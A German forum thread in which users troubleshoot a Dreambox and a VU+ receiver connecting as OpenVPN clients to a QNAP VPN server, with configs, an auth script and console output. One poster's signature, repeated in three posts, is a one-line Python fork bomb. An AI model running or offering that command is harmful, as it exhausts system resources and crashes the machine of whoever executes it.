Qnap VPN Server Dreambox als client

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Qnap VPN Server Dreambox als client

      Moin leute.
      Ich wollte meine Dm800SE an meinen Qnap VPN Server vebrinden.

      Das problem ist ich weiß net so richtig was ich falsch mache.

      Der Qnap Server gibt mir eine openvpn.ovpn und eine ca.crt

      die crt poste ich jetz mal nicht :)

      aber die ovpn

      Quellcode

      1. client
      2. dev tun
      3. script-security 3
      4. proto udp
      5. remote 192.168.178.100 1194
      6. resolv-retry infinite
      7. nobind
      8. ca ca.crt
      9. auth-user-pass
      10. reneg-sec 0
      11. cipher AES-256-CBC
      12. comp-lzo
      Alles anzeigen


      Das Kamm mir komische vor weil ich schonmal keien passwort eingabe habe...
      Also

      Quellcode

      1. client
      2. dev tun
      3. script-security 3
      4. proto udp
      5. remote xxx.xxx.xxx.xxx xxxx
      6. resolv-retry infinite
      7. nobind
      8. ca ca.crt
      9. auth-user-pass auth-script.sh
      10. reneg-sec 0
      11. cipher AES-256-CBC
      12. comp-lzo
      Alles anzeigen


      eingesetzt.

      die auth-script.sh sieht wie folgt aus.

      Shell-Script

      1. #!/bin/sh
      2. ALLOWED_USER="XXXX"
      3. ALLOWED_PASS="XXXX"
      4. if [ "$username" == "$ALLOWED_USER" ] && [ "$password" == "$ALLOWED_PASS" ] then exit 0
      5. fi
      7. exit 1


      laut openvpn wiki.

      Alles hochgeladen in /etc/openvpn/

      und der .sh 777 chmod gegeben.

      Dann ab in die GUI vom openvpn.

      und blau drücken. dann ja und der status ist immernoch n/a keine veränderung leider.

      Was überseh ich da?

      MFG Matthias

    • RE: Qnap VPN Server Dreambox als client

      Hi,

      über die OpenVpn GUI hatte ich auch nie Erfolg mit dem Starten. Bei mir war die dreambox der Server, aber das sollte egal sein.

      Meine Lösung war das manuelle Starten über die Konsole. Hast Du das schon probiert? Nachdem ich das gemacht habe, wurde der Status dann auch richtig in der OpenVPN-GUI angezeigt.

    • Die Gui erstellt eigentlich nur certifikate weil das passwortgebimmel net sehr sicher ist und starten tut die gui über das initscript also wenn euere config passt und es über das initscript geht startet das auch über gui.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • Komisch

      Quellcode

      1. *****************************
      2. * http://www.newnigma2.to *
      3. *****************************
      4. * the next step is done *
      5. *****************************
      6. OpenDreambox
      7. dm800se login: root
      8. Password:
      9. root@dm800se:~# cd /etc
      10. root@dm800se:/etc# ls
      11. CCcam.cfg hosts passwd shadow-
      12. CCcam.channelinfo image-version passwd- shells
      13. CCcam.providers inetd.conf podcast skel
      14. NETcaster.conf init.d profile smartd.conf
      15. Wireless inittab protocols sysctl.conf
      16. asound.conf inputrc rc.d syslog.conf
      17. avahi ipkg rc0.d terminfo
      18. babelzapper issue rc1.d terrestrial.xml
      19. busybox.links issue.net rc2.d timezone.xml
      20. dbus-1 ld.so.cache rc3.d tuxbox
      21. default ld.so.conf rc4.d tuxtxt
      22. devfsd.conf localtime rc5.d udev
      23. dropbear modules rc6.d udhcpc.d
      24. enigma2 modules.old rcS.d var.tar.gz
      25. filesystems motd resolv.conf version
      26. fstab mtab rpc videomode
      27. group network satellites.xml vsftpd.conf
      28. group- nsswitch.conf scsi_id.config wpa_supplicant
      29. host.conf openvpn services
      30. hostname opkg shadow
      31. root@dm800se:/etc# cd /init.d
      32. -sh: cd: can't cd to /init.d
      33. root@dm800se:/etc# init.d
      34. -sh: init.d: Permission denied
      35. root@dm800se:/etc#
      Alles anzeigen


      Ah ja ich bin root seit wann wird mir der zugriff verwehrt?

      über FTP geht also ins verzeichnis rein

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Matthias_199 ()

    • Da haperts wohl etwas mit dem Sachverstand :
      Du bist im Verzeichnis /etc/ und möchtest in /etc/init.d/ wechseln dann machst du das mit :

      cd init.d

      du kannst natürlich auch den vollständigen Pfad angeben:

      cd /etc/init.d/

      und naja init.d ist ein Verzeichnis und kein ausführbares Programm.

    • ahh jetz.

      root@dm800se:/etc/init.d# openvpn start
      Options error: In [CMD-LINE]:1: Error opening configuration file: start
      Use --help for more information.
      root@dm800se:/etc/init.d#

      Okey was passt aber mit der file net sie ist ja open gepostet

      EDIT: Tehoretisch sollte ja die file passen die spuckt mir ja so mein qnap aus

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Matthias_199 ()

    • Mal ganz einfach such den fehler in deiner config.
      Ich vermute mal du hast keinen unix fähigen editor verwendet und die config ist nicht lesbar oder ähnliches.Und das was du da machst ist kein richtiger tunnel das ist ne light version eines tunnels mit nem shared key gegen einen zertifikat bassierenden ist das ne lachnummer nur mal so am rande.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • es geht jetz wenn ich /etc/init.d# openvpn /etc/openvpn/vpn.ovpn
      Mache.

      Wie muss den in die file heißen das das newenigma es gleich startet?

      das zweite problem ist noch das es nur geht wenn,
      auth-user-pass /etc/openvpn/privnet/auth-script.sh
      zu auth-user-pass mache und dann den user und das pw manuell eingebe.
      Das is abe rnich so wirklich sinn der sache.
      Also stellt sich die frage wie ich den user und das PW definieren kann.
      bzw in ner file ablegen kann wär mir egal eins von beiden halt^^

      @ kati910 Notepad++ bitte das is zu 100% richtig.
      Mir schon klar das es light is wie gesagt ist mein qnap mehr möglichkeiten gibts nicht und es reicht wenn die box sich mit dem qnap verbindet bzw die datenpakete in das qnap netz geroutet werden das is aber ne andere geschichte.

      MFG Matthias

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Matthias_199 ()

    • Ahh
      Deine configs müssen anders heißen bzw .conf am ende haben deswegen findet das startscript deine configs net.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • Okey so läuft steht sogar läuft:)

      Blos nun gehts um die frage des logins

      EDIT:

      Nach etwas forschen für alle die das gleiche problem haben.

      auth-user-pass braucht eine file.

      auth-user-pass /etc/openvpn/privnet/pass.txt

      Kann belibig heißen.
      In der ersten zeile muss der user stehen in der zweiten das pw und schon läauft alles wie gewünscht thx für die hilfe kann geclosed werden

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Matthias_199 ()

    • hallo,
      habs hin bekommen.
      vu+ openvpn client und qnap openvpn server.
      die verbindung steht , wird angezeigt auf dem server .
      das problem ist jetzt: ich kann die freigabe ordner nicht finden auf der vu+ .
      hier noch mal die conf. vom clienten:
      client
      dev tun
      script-security 3
      proto udp
      remote name.adresse.com 1194
      resolv-retry infinite
      nobind
      ca ca.crt
      auth-user-pass login.conf
      reneg-sec 0
      cipher AES-128-CBC
      comp-lzo

      verbindung wird angezeigt, wenn ich aber auf dem mediaplayer gehe der vu+ , finde ich noch keine dateien oder ordner die vom nas freigegeben sind.
      und unter menü/ einstellung/system/netzwerk/lan verbindung2/freigabe manager/ freigabenverwaltung finde ich auch kein qnap server.
      im qnap unter verbindung , wird die client verbindung aber angezeigt.
      ;?: ;?: ;?: ;?: ;?: ;?: ;?: ;?: ;?: ;?: ;?: ;?: ;?: ;?: ;?: ;?: ;?:
      kann mir bitte einer weiter helfen?? ?-( ?-( ?-( ?-( ?-( ?-( ?-( ?-(